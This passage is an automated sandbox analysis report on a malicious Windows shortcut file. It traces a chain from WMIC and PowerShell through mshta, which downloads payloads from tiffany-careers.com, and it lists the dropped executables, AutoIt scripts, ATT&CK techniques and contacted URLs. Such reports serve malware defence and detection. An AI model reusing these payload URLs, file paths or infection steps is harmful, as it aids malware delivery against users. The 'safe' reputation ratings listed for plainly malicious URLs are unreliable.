Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC88BF4 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,wcscat,wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,wcscpy,15_2_00007FF7ADC88BF4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC62BCF GetUserNameW,15_2_00007FF7ADC62BCF
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC42650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_00007FF7ADC42650
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC21D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7ADC21D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: XKIZdXAs.exe, 0000000F.00000003.1659899214.000001B3D6459000.00000004.00000020.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000003.1660142096.000001B3D645E000.00000004.00000020.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000003.1660360987.000001B3D6461000.00000004.00000020.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000002.1665360380.000001B3D6463000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2022240307.000001E2B45A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2671312302.0000000000FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2671253844.0000000000DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000015.00000002.2016072864.000001E2B4510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2019083440.000001E2B4536000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2016072864.000001E2B451C000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1736280237.0000000004461000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1728057267.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1736780329.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1732003025.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1742564683.0000000004461000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1737575616.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1724002699.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1724243994.0000000000B00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: Guard.exe, 00000017.00000002.2670698640.0000000000CC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pC:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B45A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2000613161.000001E2B42A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2022240307.000001E2B458D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2000613161.000001E2B42AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000017.00000002.2669554964.00000000009BF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1740822897.000001E29C231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: SwiftWrite.pif.23.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC94074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00007FF7ADC94074
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC93940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_00007FF7ADC93940
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BC696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,23_2_00BC696E
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BC6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,23_2_00BC6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0086696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,27_2_0086696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00866E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_00866E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		21
Windows Management Instrumentation		1
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares21
Input Capture		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell		2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
Timestomp		NTDS38
System Information Discovery		Distributed Component Object Model3
Clipboard Data		13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		1
DLL Side-Loading		LSA Secrets151
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		231
Masquerading		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Valid Accounts		DCSync13
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Access Token Manipulation		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581249 Sample: n5Szx8qsFB.lnk Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 90 x1.i.lencr.org 2->90 92 tiffany-careers.com 2->92 94 2 other IPs or domains 2->94 100 Suricata IDS alerts for network traffic 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 Windows shortcut file (LNK) starts blacklisted processes 2->104 106 16 other signatures 2->106 15 WMIC.exe 1 2->15         started        18 wscript.exe 2->18         started        20 svchost.exe 1 1 2->20         started        signatures3 process4 dnsIp5 134 Contains functionality to create processes via WMI 15->134 136 Creates processes via WMI 15->136 23 powershell.exe 7 15->23         started        26 conhost.exe 1 15->26         started        138 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->138 28 SwiftWrite.pif 18->28         started        98 127.0.0.1 unknown unknown 20->98 signatures6 process7 signatures8 112 Windows shortcut file (LNK) starts blacklisted processes 23->112 114 Drops PE files to the user root directory 23->114 116 Powershell drops PE file 23->116 30 powershell.exe 7 23->30         started        33 conhost.exe 23->33         started        process9 signatures10 132 Windows shortcut file (LNK) starts blacklisted processes 30->132 35 mshta.exe 16 30->35         started        process11 dnsIp12 96 tiffany-careers.com 147.45.49.155, 443, 49705, 49709 FREE-NET-ASFREEnetEU Russian Federation 35->96 74 C:\Users\user\AppData\Local\...\ghep2412_2[1], PE32 35->74 dropped 108 Windows shortcut file (LNK) starts blacklisted processes 35->108 110 Suspicious powershell command line found 35->110 40 powershell.exe 17 18 35->40         started        file13 signatures14 process15 file16 82 C:\Users\user\AppData\Roaming\XKIZdXAs.exe, PE32+ 40->82 dropped 118 Binary is likely a compiled AutoIt script file 40->118 44 XKIZdXAs.exe 40->44         started        48 Acrobat.exe 61 40->48         started        50 conhost.exe 40->50         started        signatures17 process18 file19 88 C:\Users\Public\PublicProfile.ps1, ASCII 44->88 dropped 124 Windows shortcut file (LNK) starts blacklisted processes 44->124 126 Multi AV Scanner detection for dropped file 44->126 128 Suspicious powershell command line found 44->128 130 2 other signatures 44->130 52 powershell.exe 44->52         started        55 powershell.exe 44->55         started        57 AcroCEF.exe 109 48->57         started        signatures20 process21 file22 76 C:\Users\Public\Secure.au3, Unicode 52->76 dropped 59 Guard.exe 52->59         started        63 conhost.exe 52->63         started        78 C:\Users\Publicbehaviorgraphuard.exe, PE32 55->78 dropped 65 conhost.exe 55->65         started        67 AcroCEF.exe 57->67         started        process23 file24 84 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 59->84 dropped 86 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 59->86 dropped 120 Windows shortcut file (LNK) starts blacklisted processes 59->120 122 Drops PE files with a suspicious file extension 59->122 69 cmd.exe 59->69         started        signatures25 process26 file27 80 C:\Users\user\AppData\...\SwiftWrite.url, MS 69->80 dropped 72 conhost.exe 69->72         started        process28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
n5Szx8qsFB.lnk30%VirustotalBrowse
n5Szx8qsFB.lnk21%ReversingLabsWin32.Trojan.Pantera

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]37%ReversingLabsWin32.Dropper.Lumma
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\XKIZdXAs.exe35%ReversingLabsWin64.Downloader.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tiffany-careers.com/XKIZdXAs0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2...0%Avira URL Cloudsafe
https://tiffany-careers.com0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2H0%Avira URL Cloudsafe
https://tiffany-careers.com/Project_Information.pdf0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZdXAs.exe0%Avira URL Cloudsafe
https://tiffany-careers.com/ZxVMIVZIX.txt0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZ0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2kk0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZd0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2lvEb.0%Avira URL Cloudsafe
https://tiffany-careers.com/X0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2C:0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZdXA0%Avira URL Cloudsafe
https://tiffany-careers.com/XK0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZdX0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2...b0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2LMEMP0%Avira URL Cloudsafe
https://tiffany-careers.c0%Avira URL Cloudsafe
https://tiffany-careers.com/0%Avira URL Cloudsafe
https://tiffany-careers.com/ALGglt0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZdXAs.e0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZdXAs.ex0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2p0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2t0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2https://tiffany-careers.com/ghep2412_20%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2...C0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2s0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2nN0%Avira URL Cloudsafe
https://tiffany-careers.com/XKI0%Avira URL Cloudsafe
https://tiffany-careers.com/XKIZdXAs.0%Avira URL Cloudsafe
https://tiffany-careers.co0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_24d0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2Qa0%Avira URL Cloudsafe
http://tiffany-careers.com0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2$global:?0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_20%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2412_2TTC:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    tiffany-careers.com
    		147.45.49.155
    		truefalse
      		high
      x1.i.lencr.org
      		unknown
      		unknownfalse
        		high
        nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://tiffany-careers.com/XKIZdXAs.exetrue
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/Project_Information.pdftrue
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/ZxVMIVZIX.txttrue
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/ALGglttrue
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/ghep2412_2true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://tiffany-careers.com/ghep2412_2Hmshta.exe, 00000006.00000002.1791567610.000002151DC20000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/XKIZdXAspowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.compowershell.exe, 00000009.00000002.1608154018.000002821EC0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29CF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29C0C0000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/ghep2412_2...mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://tiffany-careers.com/XKIZdpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.autoitscript.com/autoit3/Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drfalse
              		high
              https://tiffany-careers.com/XKIZpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://tiffany-careers.com/ghep2412_2kkmshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://tiffany-careers.com/ghep2412_2lvEb.powershell.exe, 00000005.00000002.1442345728.0000019633F3B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://tiffany-careers.com/Xpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://tiffany-careers.com/ghep2412_2C:mshta.exe, 00000006.00000002.1790635120.000002151DAC0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1680477076.000002822EA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932942954.000001E2ABE89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://tiffany-careers.com/XKpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tiffany-careers.com/XKIZdXApowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
